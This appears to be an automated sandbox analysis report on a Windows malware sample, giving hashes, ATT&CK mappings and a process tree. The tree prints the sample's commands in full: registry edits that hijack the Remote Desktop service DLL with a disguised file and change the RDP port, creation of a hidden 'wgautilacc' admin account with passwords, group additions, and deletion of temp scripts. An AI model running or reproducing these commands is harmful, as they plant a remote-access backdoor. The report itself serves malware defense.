cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36

Analysis

max time kernel
55s
max time network
124s
platform
windows10_x64
resource
win10v20201028
submitted
11-11-2020 10:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe
Size

3.1MB
MD5

63a4fa287d067ff9083c6d2bf5735016
SHA1

0e1ca1394559574751ba43f377aeea877ae4705c
SHA256

cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36
SHA512

424e2a60e704b983a4bef4a5c275c1133bbc2fd0b8d1b1b971dd79b74083878a6a8319816fc94d00f2c46e3abbaf7e4a4dd0e7599f6bdd80322f3d8a1f8a2121

Score

9^/10

persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

1696
1696

pid	process
1696
1696

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2212 reg.exe
Runs net.exe

pid	process
2212	reg.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
1392	powershell.exe
1392	powershell.exe
1392	powershell.exe
640	powershell.exe
640	powershell.exe
640	powershell.exe
3704	powershell.exe
3704	powershell.exe
3704	powershell.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

616
616

pid	process
616
616

Suspicious use of AdjustPrivilegeToken 67 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4028	powershell.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	3704	powershell.exe
Token: SeIncreaseQuotaPrivilege	640	powershell.exe
Token: SeSecurityPrivilege	640	powershell.exe
Token: SeTakeOwnershipPrivilege	640	powershell.exe
Token: SeLoadDriverPrivilege	640	powershell.exe
Token: SeSystemProfilePrivilege	640	powershell.exe
Token: SeSystemtimePrivilege	640	powershell.exe
Token: SeProfSingleProcessPrivilege	640	powershell.exe
Token: SeIncBasePriorityPrivilege	640	powershell.exe
Token: SeCreatePagefilePrivilege	640	powershell.exe
Token: SeBackupPrivilege	640	powershell.exe
Token: SeRestorePrivilege	640	powershell.exe
Token: SeShutdownPrivilege	640	powershell.exe
Token: SeDebugPrivilege	640	powershell.exe
Token: SeSystemEnvironmentPrivilege	640	powershell.exe
Token: SeRemoteShutdownPrivilege	640	powershell.exe
Token: SeUndockPrivilege	640	powershell.exe
Token: SeManageVolumePrivilege	640	powershell.exe
Token: 33	640	powershell.exe
Token: 34	640	powershell.exe
Token: 35	640	powershell.exe
Token: 36	640	powershell.exe
Token: SeIncreaseQuotaPrivilege	3704	powershell.exe
Token: SeSecurityPrivilege	3704	powershell.exe
Token: SeTakeOwnershipPrivilege	3704	powershell.exe
Token: SeLoadDriverPrivilege	3704	powershell.exe
Token: SeSystemProfilePrivilege	3704	powershell.exe
Token: SeSystemtimePrivilege	3704	powershell.exe
Token: SeProfSingleProcessPrivilege	3704	powershell.exe
Token: SeIncBasePriorityPrivilege	3704	powershell.exe
Token: SeCreatePagefilePrivilege	3704	powershell.exe
Token: SeBackupPrivilege	3704	powershell.exe
Token: SeRestorePrivilege	3704	powershell.exe
Token: SeShutdownPrivilege	3704	powershell.exe
Token: SeDebugPrivilege	3704	powershell.exe
Token: SeSystemEnvironmentPrivilege	3704	powershell.exe
Token: SeRemoteShutdownPrivilege	3704	powershell.exe
Token: SeUndockPrivilege	3704	powershell.exe
Token: SeManageVolumePrivilege	3704	powershell.exe
Token: 33	3704	powershell.exe
Token: 34	3704	powershell.exe
Token: 35	3704	powershell.exe
Token: 36	3704	powershell.exe
Token: SeIncreaseQuotaPrivilege	1392	powershell.exe
Token: SeSecurityPrivilege	1392	powershell.exe
Token: SeTakeOwnershipPrivilege	1392	powershell.exe
Token: SeLoadDriverPrivilege	1392	powershell.exe
Token: SeSystemProfilePrivilege	1392	powershell.exe
Token: SeSystemtimePrivilege	1392	powershell.exe
Token: SeProfSingleProcessPrivilege	1392	powershell.exe
Token: SeIncBasePriorityPrivilege	1392	powershell.exe
Token: SeCreatePagefilePrivilege	1392	powershell.exe
Token: SeBackupPrivilege	1392	powershell.exe
Token: SeRestorePrivilege	1392	powershell.exe
Token: SeShutdownPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeSystemEnvironmentPrivilege	1392	powershell.exe
Token: SeRemoteShutdownPrivilege	1392	powershell.exe
Token: SeUndockPrivilege	1392	powershell.exe
Token: SeManageVolumePrivilege	1392	powershell.exe
Token: 33	1392	powershell.exe

Suspicious use of WriteProcessMemory 70 IoCs

Processes:

cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 632 wrote to memory of 4028	632	cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe	powershell.exe
PID 632 wrote to memory of 4028	632	cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe	powershell.exe
PID 4028 wrote to memory of 184	4028	powershell.exe	csc.exe
PID 4028 wrote to memory of 184	4028	powershell.exe	csc.exe
PID 184 wrote to memory of 3608	184	csc.exe	cvtres.exe
PID 184 wrote to memory of 3608	184	csc.exe	cvtres.exe
PID 4028 wrote to memory of 1392	4028	powershell.exe	powershell.exe
PID 4028 wrote to memory of 1392	4028	powershell.exe	powershell.exe
PID 4028 wrote to memory of 640	4028	powershell.exe	powershell.exe
PID 4028 wrote to memory of 640	4028	powershell.exe	powershell.exe
PID 4028 wrote to memory of 3704	4028	powershell.exe	powershell.exe
PID 4028 wrote to memory of 3704	4028	powershell.exe	powershell.exe
PID 4028 wrote to memory of 2112	4028	powershell.exe	reg.exe
PID 4028 wrote to memory of 2112	4028	powershell.exe	reg.exe
PID 4028 wrote to memory of 2212	4028	powershell.exe	reg.exe
PID 4028 wrote to memory of 2212	4028	powershell.exe	reg.exe
PID 4028 wrote to memory of 380	4028	powershell.exe	reg.exe
PID 4028 wrote to memory of 380	4028	powershell.exe	reg.exe
PID 4028 wrote to memory of 2584	4028	powershell.exe	net.exe
PID 4028 wrote to memory of 2584	4028	powershell.exe	net.exe
PID 2584 wrote to memory of 424	2584	net.exe	net1.exe
PID 2584 wrote to memory of 424	2584	net.exe	net1.exe
PID 4028 wrote to memory of 2188	4028	powershell.exe	cmd.exe
PID 4028 wrote to memory of 2188	4028	powershell.exe	cmd.exe
PID 2188 wrote to memory of 2252	2188	cmd.exe	cmd.exe
PID 2188 wrote to memory of 2252	2188	cmd.exe	cmd.exe
PID 2252 wrote to memory of 1632	2252	cmd.exe	net.exe
PID 2252 wrote to memory of 1632	2252	cmd.exe	net.exe
PID 1632 wrote to memory of 3360	1632	net.exe	net1.exe
PID 1632 wrote to memory of 3360	1632	net.exe	net1.exe
PID 4028 wrote to memory of 3996	4028	powershell.exe	cmd.exe
PID 4028 wrote to memory of 3996	4028	powershell.exe	cmd.exe
PID 3996 wrote to memory of 3724	3996	cmd.exe	cmd.exe
PID 3996 wrote to memory of 3724	3996	cmd.exe	cmd.exe
PID 3724 wrote to memory of 4032	3724	cmd.exe	net.exe
PID 3724 wrote to memory of 4032	3724	cmd.exe	net.exe
PID 4032 wrote to memory of 1112	4032	net.exe	net1.exe
PID 4032 wrote to memory of 1112	4032	net.exe	net1.exe
PID 1132 wrote to memory of 2316	1132	cmd.exe	net.exe
PID 1132 wrote to memory of 2316	1132	cmd.exe	net.exe
PID 2316 wrote to memory of 2272	2316	net.exe	net1.exe
PID 2316 wrote to memory of 2272	2316	net.exe	net1.exe
PID 852 wrote to memory of 2420	852	cmd.exe	net.exe
PID 852 wrote to memory of 2420	852	cmd.exe	net.exe
PID 2420 wrote to memory of 784	2420	net.exe	net1.exe
PID 2420 wrote to memory of 784	2420	net.exe	net1.exe
PID 3964 wrote to memory of 1952	3964	cmd.exe	net.exe
PID 3964 wrote to memory of 1952	3964	cmd.exe	net.exe
PID 1952 wrote to memory of 3860	1952	net.exe	net1.exe
PID 1952 wrote to memory of 3860	1952	net.exe	net1.exe
PID 3360 wrote to memory of 2188	3360	cmd.exe	net.exe
PID 3360 wrote to memory of 2188	3360	cmd.exe	net.exe
PID 2188 wrote to memory of 1888	2188	net.exe	net1.exe
PID 2188 wrote to memory of 1888	2188	net.exe	net1.exe
PID 3232 wrote to memory of 1836	3232	cmd.exe	net.exe
PID 3232 wrote to memory of 1836	3232	cmd.exe	net.exe
PID 1836 wrote to memory of 3372	1836	net.exe	net1.exe
PID 1836 wrote to memory of 3372	1836	net.exe	net1.exe
PID 3872 wrote to memory of 64	3872	cmd.exe	net.exe
PID 3872 wrote to memory of 64	3872	cmd.exe	net.exe
PID 64 wrote to memory of 2212	64	net.exe	net1.exe
PID 64 wrote to memory of 2212	64	net.exe	net1.exe
PID 4028 wrote to memory of 1240	4028	powershell.exe	cmd.exe
PID 4028 wrote to memory of 1240	4028	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe
"C:\Users\Admin\AppData\Local\Temp\cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:632

\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4028

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aiaedqju\aiaedqju.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:184

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE93.tmp" "c:\Users\Admin\AppData\Local\Temp\aiaedqju\CSC8AF4BC17464D01A9D7659FDF91E9B.TMP"
4⤵
PID:3608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3704

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:2112

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:2212

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:380

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:2584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:424

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:3360

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:3996

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:3724

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:4032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:1112

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:1240

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:3168

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:1132

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:2316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:2272

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc ZzvnUmPS /add
1⤵
- Suspicious use of WriteProcessMemory
PID:852

C:\Windows\system32\net.exe
net.exe user wgautilacc ZzvnUmPS /add
2⤵
- Suspicious use of WriteProcessMemory
PID:2420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc ZzvnUmPS /add
3⤵
PID:784

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:1952

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
3⤵
PID:3860

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3360

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
3⤵
PID:1888

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:3232

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:1836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:3372

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc ZzvnUmPS
1⤵
- Suspicious use of WriteProcessMemory
PID:3872

C:\Windows\system32\net.exe
net.exe user wgautilacc ZzvnUmPS
2⤵
- Suspicious use of WriteProcessMemory
PID:64

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc ZzvnUmPS
3⤵
PID:2212

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:3288

C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
PID:1712

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
PID:1564

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
525c8172539cddd625bd3fe2e504b75c

SHA1
89b62752eaa65c9caf68b4229216b3bfd4091b93

SHA256
66a60ca54dba739c590f7644d6e5ef731c51ac80835786f8155fd5dcf8ec3ef4

SHA512
4de4d86027cd2f19b274fda37a4319d4f3cdd3729d83f5d58781ce14713403c095455df1434216eeed6a6d06439a92e844edecb7d05a989cf4625e868d53bc31

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBE93.tmp
MD5
79e08933902978f1643b8582bf3197d7

SHA1
c2724ed8ddda3141cdc1575fc77b84a1c93a4823

SHA256
03ac892aad4412f676a286320a0c67bf9a587dd4bc869f3b8bd051ad9b3cda93

SHA512
3ec0d1c7e45c06cdac6dc68f0a4733a7cecb29ee789e28136298a15aed63ed08b1b4b883ef56e769d4174837db38f5fa6a6d1e3fd4d798e5089b486d16529ae0

Download Submit
C:\Users\Admin\AppData\Local\Temp\aiaedqju\aiaedqju.dll
MD5
e85bbc5001eba2335e3573e08fd8a68c

SHA1
5ffc718ccde75123662989b2d0ad89bece2c97e5

SHA256
863faaee290b318c2d679d4bb92e518e27410a22e3fe269d2db422d8726c118a

SHA512
bce1bd6fa0a947e4b7bb48a6ff9e3e2fe04528745db146b2165a80c1166bb5a89fa3abfa3129c1b2e37bc8500e4eb2fbfec867423d4d0b656469bb69a10d0142

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
41d1a9d1cbee90f1e5f27fdfb299f8b8

SHA1
1e9ac27006a7c364649265246fccbd719418ceab

SHA256
0f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4

SHA512
f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aiaedqju\CSC8AF4BC17464D01A9D7659FDF91E9B.TMP
MD5
b853fe0d9efef8656f10907b6beeebd5

SHA1
4200f3dc0fe3d704aa00d2070797a05e41fd31ab

SHA256
014fb2b2ae663435214e82b414327d2149c012738ab87f67e07832f0b9bfbe43

SHA512
1d311a28ed1c073745e2c5d3204cf3a0f94ec9f9ddcddcd3d1b8d27766f540c8ae7d61babc31ca0e96e5e380b4eb54da2f338ebc7613f8d48ded053fbd6fb44e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aiaedqju\aiaedqju.0.cs
MD5
8e55cb0ca998472ab6d3e295e0c4dd50

SHA1
407d07a29b89fc3afc246c0680d5857e3f51019d

SHA256
63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

SHA512
c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aiaedqju\aiaedqju.cmdline
MD5
8dea0e89d03bffd646d16884da5b01a0

SHA1
9585070bed528144401068f4a19e8c5612856e2a

SHA256
15f568c1692b1774894730a86e019456f11035ed26742b3a5348aca0d0af94b9

SHA512
f4bc8a23b62e35e61d97d201155d842ef0faf2c490b13802fbe3d6f3e88f69f624c0d9a5b44fae59cbcb28cd0916d6c133635d83ed6ee32dfca3215e596ec841

Download Submit
\Windows\Branding\mediasrv.png
MD5
37fb7ba711ffbe9d6ebb27d54e827966

SHA1
4d4d9303e011bcb14720b24239a1aacd58122f47

SHA256
81b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5

SHA512
3f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf

Download Submit
\Windows\Branding\mediasvc.png
MD5
2f916498a393e2f0d008d33a74c062ba

SHA1
404d52d4253ef3843ae3f2c4aff050f37fcd3f08

SHA256
d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412

SHA512
d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10

Download Submit
memory/64-56-0x0000000000000000-mapping.dmp

Download
memory/184-8-0x0000000000000000-mapping.dmp

Download
memory/380-33-0x0000000000000000-mapping.dmp

Download
memory/424-35-0x0000000000000000-mapping.dmp

Download
memory/632-1-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

Filesize
4KB

Download
memory/640-22-0x0000000000000000-mapping.dmp

Download
memory/640-23-0x00007FF9E7010000-0x00007FF9E79FC000-memory.dmp

Filesize
9.9MB

Download
memory/784-49-0x0000000000000000-mapping.dmp

Download
memory/1112-43-0x0000000000000000-mapping.dmp

Download
memory/1240-58-0x0000000000000000-mapping.dmp

Download
memory/1392-18-0x0000000000000000-mapping.dmp

Download
memory/1392-19-0x00007FF9E7010000-0x00007FF9E79FC000-memory.dmp

Filesize
9.9MB

Download
memory/1564-61-0x0000000000000000-mapping.dmp

Download
memory/1632-38-0x0000000000000000-mapping.dmp

Download
memory/1712-60-0x0000000000000000-mapping.dmp

Download
memory/1836-54-0x0000000000000000-mapping.dmp

Download
memory/1888-53-0x0000000000000000-mapping.dmp

Download
memory/1952-50-0x0000000000000000-mapping.dmp

Download
memory/2112-31-0x0000000000000000-mapping.dmp

Download
memory/2188-52-0x0000000000000000-mapping.dmp

Download
memory/2188-36-0x0000000000000000-mapping.dmp

Download
memory/2212-32-0x0000000000000000-mapping.dmp

Download
memory/2212-57-0x0000000000000000-mapping.dmp

Download
memory/2252-37-0x0000000000000000-mapping.dmp

Download
memory/2272-47-0x0000000000000000-mapping.dmp

Download
memory/2316-46-0x0000000000000000-mapping.dmp

Download
memory/2420-48-0x0000000000000000-mapping.dmp

Download
memory/2584-34-0x0000000000000000-mapping.dmp

Download
memory/3168-59-0x0000000000000000-mapping.dmp

Download
memory/3360-39-0x0000000000000000-mapping.dmp

Download
memory/3372-55-0x0000000000000000-mapping.dmp

Download
memory/3608-11-0x0000000000000000-mapping.dmp

Download
memory/3704-27-0x00007FF9E7010000-0x00007FF9E79FC000-memory.dmp

Filesize
9.9MB

Download
memory/3704-25-0x0000000000000000-mapping.dmp

Download
memory/3724-41-0x0000000000000000-mapping.dmp

Download
memory/3860-51-0x0000000000000000-mapping.dmp

Download
memory/3996-40-0x0000000000000000-mapping.dmp

Download
memory/4028-16-0x000001CCA05B0000-0x000001CCA05B1000-memory.dmp

Filesize
4KB

Download
memory/4028-6-0x000001CC982E0000-0x000001CC982E1000-memory.dmp

Filesize
4KB

Download
memory/4028-15-0x000001CC98010000-0x000001CC98011000-memory.dmp

Filesize
4KB

Download
memory/4028-5-0x000001CCFFEF0000-0x000001CCFFEF1000-memory.dmp

Filesize
4KB

Download
memory/4028-17-0x000001CCA0940000-0x000001CCA0941000-memory.dmp

Filesize
4KB

Download
memory/4028-4-0x000001CCFD2D0000-0x000001CCFD2D1000-memory.dmp

Filesize
4KB

Download
memory/4028-3-0x00007FF9E7010000-0x00007FF9E79FC000-memory.dmp

Filesize
9.9MB

Download
memory/4028-2-0x0000000000000000-mapping.dmp

Download
memory/4032-42-0x0000000000000000-mapping.dmp

Download